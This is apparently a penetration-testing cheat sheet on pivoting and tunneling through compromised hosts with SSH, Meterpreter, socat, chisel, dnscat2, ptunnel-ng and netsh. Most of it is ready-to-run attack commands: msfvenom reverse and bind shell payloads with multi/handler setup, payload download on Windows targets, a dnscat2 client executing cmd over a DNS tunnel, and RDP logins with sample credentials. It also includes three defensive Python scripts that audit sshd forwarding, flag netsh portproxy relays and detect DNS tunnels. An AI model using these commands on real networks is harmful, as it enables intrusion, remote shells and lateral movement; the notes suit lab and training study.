
# Pivoting, Tunneling, and Port Forwarding

## **Dynamic Port Forwarding with SSH and SOCKS Tunneling**

### Local Port Forwarding

```bash
# 1234 - attack host port
# 3306 - target host port
ssh -L 1234:localhost:3306 ubuntu@ip

# Confirm the listener on the attack host
netstat -antp | grep 1234

# Multiple port forwards: each forward needs its own -L
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@ip
```

### Dynamic Port Forwarding

```bash
# Enabling Dynamic Port Forwarding
# 9050 - attack host port
ssh -D 9050 ubuntu@ip

# Editing proxychains configuration file /etc/proxychains.conf
# We can add socks4 127.0.0.1 9050 to the last line if it is not already there.

# Checking /etc/proxychains.conf
tail -4 /etc/proxychains.conf

# Using Nmap with Proxychains
# 172.16.5.1-200 - the internal range we could not scan before
proxychains nmap -v -sn 172.16.5.1-200

# Using Metasploit with Proxychains
proxychains msfconsole

# Using xfreerdp with Proxychains
proxychains xfreerdp /v:ip /u:eren /p:pass
```

## **Remote/Reverse Port Forwarding with SSH**

```bash
# Creating a Windows Payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

# Configuring & Starting the multi/handler (inside msfconsole)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run

# Transferring Payload to Pivot Host
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/

# Starting Python3 Webserver on Pivot Host
python3 -m http.server 8123

# Downloading Payload from Windows Target
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

# SSH remote port forwarding
# Pivot host listens on <InternalIPofPivotHost>:8080 and relays to port 8000 on the attack host
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

# Run the payload on the Windows target and get a shell
```
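All of the SSH forwards above (-L, -D and -R) only work if the sshd on the pivot host permits them, so the defensive check is the sshd_config. The following is an added example, not from the original notes: a small Python audit of the global section of an sshd_config, reporting which forwarding directives are effectively enabled. It uses the real OpenSSH directives `AllowTcpForwarding`, `GatewayPorts`, `PermitTunnel` and `AllowStreamLocalForwarding` with their documented defaults; both config samples are constructed.

```python
import re

# sshd_config directives that govern the -L / -D / -R forwards used above and
# the value OpenSSH applies when the directive is absent (sshd_config(5) defaults).
FORWARDING_DIRECTIVES = {
    "AllowTcpForwarding": "yes",          # needed by -L, -D and -R
    "GatewayPorts": "no",                 # may -R listeners bind non-loopback addresses?
    "PermitTunnel": "no",                 # tun(4) device forwarding (ssh -w)
    "AllowStreamLocalForwarding": "yes",  # Unix-domain socket forwarding
}

# Constructed sample of a permissive pivot host configuration.
PERMISSIVE_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding yes
GatewayPorts clientspecified
#PermitTunnel no
Match User backup
    AllowTcpForwarding no
"""

# Constructed sample with forwarding switched off for every user.
HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
AllowStreamLocalForwarding no
"""


def parse_sshd_config(text):
    """Return {lowercased directive: value} for the global section of an sshd_config.
    Only the first occurrence of a directive counts (sshd uses the first value it reads),
    and parsing stops at the first Match block, whose settings are conditional."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[ \t=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        value = parts[1].strip() if len(parts) > 1 else ""
        settings.setdefault(key, value)
    return settings


def audit_forwarding(text):
    """Return {directive: (effective_value, enabled)} for each forwarding directive.
    'enabled' is True for any value other than 'no', so partial settings such as
    'AllowTcpForwarding local' or 'GatewayPorts clientspecified' count as enabled."""
    settings = parse_sshd_config(text)
    report = {}
    for directive, default in FORWARDING_DIRECTIVES.items():
        value = settings.get(directive.lower(), default).lower()
        report[directive] = (value, value != "no")
    return report


def enabled_forwarding(text):
    """Names of forwarding directives that are effectively enabled."""
    return [d for d, (_, on) in audit_forwarding(text).items() if on]


if __name__ == "__main__":
    for name, cfg in (("permissive", PERMISSIVE_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, enabled_forwarding(cfg))
```

Note that a per-user `Match` block is deliberately ignored: it can tighten forwarding for one account, but the global setting is what applies to every other account, which is what matters when the compromised credentials are not the one that was restricted.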

## **Meterpreter Tunneling & Port Forwarding**

```bash
# Creating Payload for Ubuntu Pivot Host
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.10 -f elf -o backupjob LPORT=8080

# Configuring & Starting the multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp

# Transfer and Execute the Payload on the Pivot Host

# After we get a shell on the pivot host, we can use meterpreter modules for different tasks
# Ping Sweep module
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

# Ping Sweep For Loop on Linux Pivot Hosts
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

# Ping Sweep For Loop Using CMD
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

# Ping Sweep Using PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}

# Configuring MSF's SOCKS Proxy

use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a

# Confirming Proxy Server is Running
jobs

# Adding a Line to proxychains.conf if Needed
socks4 127.0.0.1 9050

# Creating Routes with AutoRoute (from msfconsole)
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

# Alternatively, from inside the meterpreter session
run autoroute -s 172.16.5.0/23

# Testing Proxy & Routing Functionality
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
```

#### **Port Forwarding - portfwd module**

```bash
# Creating Local TCP Relay
portfwd add -l 3300 -p 3389 -r 172.16.5.19

# Connecting to Windows Target through localhost
xfreerdp /v:localhost:3300 /u:victor /p:pass@123
```

#### **Meterpreter Reverse Port Forwarding**

```bash
# Reverse Port Forwarding Rules (from the meterpreter session on the pivot host)
# -l 8081 - port the attack host listens on
# -p 1234 - port opened on the pivot host; connections to it are relayed back to the attack host
# -L 10.10.14.18 - attack host address
portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

# Configuring & Starting multi/handler
# If we have a shell already, run bg command
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 8081
set LHOST 0.0.0.0
run

# Generating the Windows Payload (calls back to the pivot host, which relays to us)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234
```

## Socat

### **Socat Redirection with a Reverse Shell**

```bash
# Starting Socat Listener on pivot host
# 10.10.14.18:80 - attack host ip and port
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Creating the Payload - Windows
# 172.16.5.129 - ip of pivot host 
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

# Configuring & Starting the multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
```

### **Socat Redirection with a Bind Shell**

```bash
# Creating the Payload - Windows
# Bind shell
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443

# Starting Socat Bind Shell Listener
# 172.16.5.19:8443 - ip, port of system on internal network
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

# Configuring & Starting the Bind multi/handler
# RHOST - ip of pivot host, LPORT - port of the socat listener on the pivot host
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64
set LPORT 8080
```

## **SSH for Windows: plink.exe**

### Dynamic port forwarding

```bash
# This starts an SSH session between the Windows attack host and the Ubuntu server, and then plink starts listening on port 9050.
plink -D 9050 ubuntu@10.129.15.50

# Proxifier - https://www.proxifier.com/
# Proxifier can be used to start a SOCKS tunnel via the SSH session we created.
```

## **SSH Pivoting with Sshuttle**

```bash
# Installation
sudo apt-get install sshuttle

# Running Sshuttle
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
```

## **Web Server Pivoting with Rpivot**

```bash
# Installation
sudo git clone https://github.com/klsecservices/rpivot.git

# python 2.7
sudo apt-get install python2.7

# Running server.py from the Attack Host
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

# Transferring rpivot to the Target
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

# Running client.py from Pivot Target
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

# Browsing to the Target Webserver using Proxychains
proxychains firefox-esr 172.16.5.135:80

# Connecting to a Web Server using HTTP-Proxy & NTLM Auth
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
```

## **Port Forwarding with Windows Netsh**

```bash
# Using Netsh.exe to Port Forward
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

# Verifying Port Forward
netsh.exe interface portproxy show v4tov4

# changing firewall rules to allow the traffic (if needed)
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=192.168.151.10 localport=8080 action=allow

# Connecting to the Internal Host through the Port Forward
# traffic to 10.129.15.150:8080 (pivot host) is forwarded to 172.16.5.25:3389 (internal network host)
xfreerdp /v:10.129.15.150:8080 /u:eren /p:pass
```
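From the defender's side, the `netsh interface portproxy show v4tov4` output above is also the quickest inventory of relays configured on a Windows host. The following is an added example, not part of the original notes: a Python parser for that table that flags rules listening on a network-reachable address, forwarding to another host, or exposing a sensitive service, and prints the matching `netsh ... delete` command for cleanup. The sample output and the port list are constructed.

```python
import re

# Constructed sample of `netsh interface portproxy show v4tov4` output. The table
# layout follows the real command; the two rules are made up for the example.
SAMPLE_PORTPROXY_OUTPUT = """\

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.15.150   8080        172.16.5.25     3389
0.0.0.0         443         172.16.5.19     445
"""

# Services whose exposure through a relay deserves a closer look (constructed list).
SENSITIVE_PORTS = {22: "ssh", 445: "smb", 3389: "rdp", 5985: "winrm", 5986: "winrm-tls"}

# A data row is address, port, address, port; header and separator rows do not match.
RULE_RE = re.compile(r"^(\S+)\s+(\d{1,5})\s+(\S+)\s+(\d{1,5})$")


def parse_portproxy(text):
    """Parse the data rows of `netsh interface portproxy show v4tov4` into dicts."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        la, lp, ca, cp = m.groups()
        rules.append({"listen_addr": la, "listen_port": int(lp),
                      "connect_addr": ca, "connect_port": int(cp)})
    return rules


def classify_rule(rule):
    """Reasons a rule matters: a listener on a routable address that hands the
    connection to a different host turns the machine into a relay into that network."""
    reasons = []
    if rule["listen_addr"] not in ("127.0.0.1", "localhost"):
        reasons.append("listener reachable from the network")
    if rule["connect_addr"] not in ("127.0.0.1", "localhost", rule["listen_addr"]):
        reasons.append("forwards to another host (%s)" % rule["connect_addr"])
    svc = SENSITIVE_PORTS.get(rule["connect_port"])
    if svc:
        reasons.append("exposes %s (port %d)" % (svc, rule["connect_port"]))
    return reasons


def flagged_rules(text):
    """Return (rule, reasons) for every rule with at least one reason to review."""
    out = []
    for rule in parse_portproxy(text):
        reasons = classify_rule(rule)
        if reasons:
            out.append((rule, reasons))
    return out


def delete_command(rule):
    """The netsh command that removes a rule; the listen side identifies it."""
    return ("netsh interface portproxy delete v4tov4 listenport=%d listenaddress=%s"
            % (rule["listen_port"], rule["listen_addr"]))


if __name__ == "__main__":
    for rule, reasons in flagged_rules(SAMPLE_PORTPROXY_OUTPUT):
        print("%(listen_addr)s:%(listen_port)d -> %(connect_addr)s:%(connect_port)d" % rule)
        for r in reasons:
            print("   -", r)
        print("   cleanup:", delete_command(rule))
```

Feed it the saved output of the `show v4tov4` command from a host under investigation; a rule that listens on a non-loopback address and forwards to a different subnet is exactly the shape of the pivot configured above.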

## **DNS Tunneling with Dnscat2**

```bash
# Cloning dnscat2 and Setting Up the Server
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

# Starting the dnscat2 server; save the secret key it prints for future authentication
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=domain.local --no-cache

# Cloning dnscat2-powershell to the Attack Host
git clone https://github.com/lukebaggett/dnscat2-powershell.git

# Importing dnscat2.ps1 (on the Windows target)
PS C:\> Import-Module .\dnscat2.ps1

# Establish a tunnel with the server running on our attack host
PS C:\> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain domain.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

# If everything works, we get a session on the server side and can interact with it
# Listing dnscat2 Options
dnscat2> ?

# Interacting with the Established Session
dnscat2> window -i 1
```
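A dnscat2 session like the one above shows up in DNS telemetry as a burst of queries for a single zone whose leftmost labels are long hex strings (the encoded packet data), often of TXT/CNAME/MX type rather than A. The following is an added detection example, not part of the original notes: it profiles a constructed DNS query log per client and zone and flags the combinations that look like a tunnel. The log format (timestamp, client, name, type) and the thresholds are assumptions; the hex labels are generated deterministically only to resemble dnscat2's encoding.

```python
import hashlib
import re
from collections import defaultdict
from statistics import mean

# A leftmost label that is nothing but lowercase hex and at least 16 chars long.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")

# Constructed DNS query log: "timestamp client qname qtype". The long hex labels
# under domain.local imitate dnscat2's encoding of packet data into subdomains;
# the sha256 slices are just a deterministic way to make realistic-looking labels.
TUNNEL_LOG = [
    f"2024-01-01T10:00:{i:02d} 172.16.5.50 {hashlib.sha256(bytes([i])).hexdigest()[:48]}.domain.local TXT"
    for i in range(12)
]
NORMAL_LOG = [
    "2024-01-01T10:00:01 172.16.5.50 www.example.com A",
    "2024-01-01T10:00:02 172.16.5.50 mail.example.com MX",
    "2024-01-01T10:00:03 172.16.5.51 api.example.com A",
    "2024-01-01T10:00:04 172.16.5.51 cdn.example.com A",
    "2024-01-01T10:00:05 172.16.5.51 www.example.com A",
]
SAMPLE_LOG = TUNNEL_LOG + NORMAL_LOG


def parse_log(lines):
    """Yield (client, zone, leftmost_label, qtype) per well-formed line.
    The zone is approximated as the last two labels (no public-suffix handling)."""
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        _, client, qname, qtype = parts
        labels = qname.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue  # a bare zone lookup carries no subdomain payload
        yield client, ".".join(labels[-2:]), labels[0], qtype


def profile_queries(lines):
    """Aggregate per (client, zone): query count, label lengths,
    number of hex-looking labels and the set of query types seen."""
    stats = defaultdict(lambda: {"count": 0, "lengths": [], "hex": 0, "qtypes": set()})
    for client, zone, label, qtype in parse_log(lines):
        s = stats[(client, zone)]
        s["count"] += 1
        s["lengths"].append(len(label))
        s["hex"] += bool(HEX_LABEL.match(label))
        s["qtypes"].add(qtype)
    return stats


def find_tunnel_candidates(lines, min_queries=10, min_label_len=20, min_hex_fraction=0.8):
    """Return the (client, zone) pairs whose query volume, label length and hex
    fraction all exceed the thresholds, with the supporting numbers."""
    out = []
    for (client, zone), s in sorted(profile_queries(lines).items()):
        avg_len = mean(s["lengths"])
        hex_frac = s["hex"] / s["count"]
        if s["count"] >= min_queries and avg_len >= min_label_len and hex_frac >= min_hex_fraction:
            out.append({"client": client, "zone": zone, "queries": s["count"],
                        "mean_label_len": round(avg_len, 1), "hex_fraction": round(hex_frac, 2),
                        "qtypes": sorted(s["qtypes"])})
    return out


if __name__ == "__main__":
    for hit in find_tunnel_candidates(SAMPLE_LOG):
        print(hit)
```

The thresholds are per-environment choices: CDNs and some anti-spam services also generate long hashed labels, so in practice the zone and the query types are what separate a tunnel to an attacker-controlled domain from legitimate high-volume lookups.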

## **SOCKS5 Tunneling with Chisel**

```bash
# Setting Up & Using Chisel
git clone https://github.com/jpillora/chisel.git
cd chisel
go build

# Transferring Chisel Binary to Pivot Host
scp chisel ubuntu@10.129.202.64:~/

# Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5

# Connecting to the Chisel Server
./chisel client -v 10.129.202.64:1234 socks

# Editing & Confirming proxychains.conf
socks5 127.0.0.1 1080

# Pivoting to the DC
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
```

### **Chisel Reverse Pivot**

```bash
# Starting the Chisel Server on our Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5

# Then we connect from the pivot host to our attack host, using the option R:socks
./chisel client -v 10.10.14.17:1234 R:socks

# Editing & Confirming proxychains.conf
socks5 127.0.0.1 1080

# Pivoting to internal host
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
```

## **ICMP Tunneling with SOCKS**

```bash
# Setting Up & Using ptunnel-ng
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng

# Building ptunnel-ng with autogen.sh
sudo ./autogen.sh

# Transferring Ptunnel-ng to the Pivot Host
scp -r ptunnel-ng ubuntu@10.129.202.64:~/

# Starting the ptunnel-ng Server on the Pivot Host
sudo ./ptunnel-ng -r10.129.202.64 -R22

# Connecting to ptunnel-ng Server from Attack Host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

# Tunneling an SSH connection through an ICMP Tunnel
ssh -p2222 -lubuntu 127.0.0.1

# Enabling Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

# Proxychaining through the ICMP Tunnel
proxychains nmap -sV -sT 172.16.5.19 -p3389
```
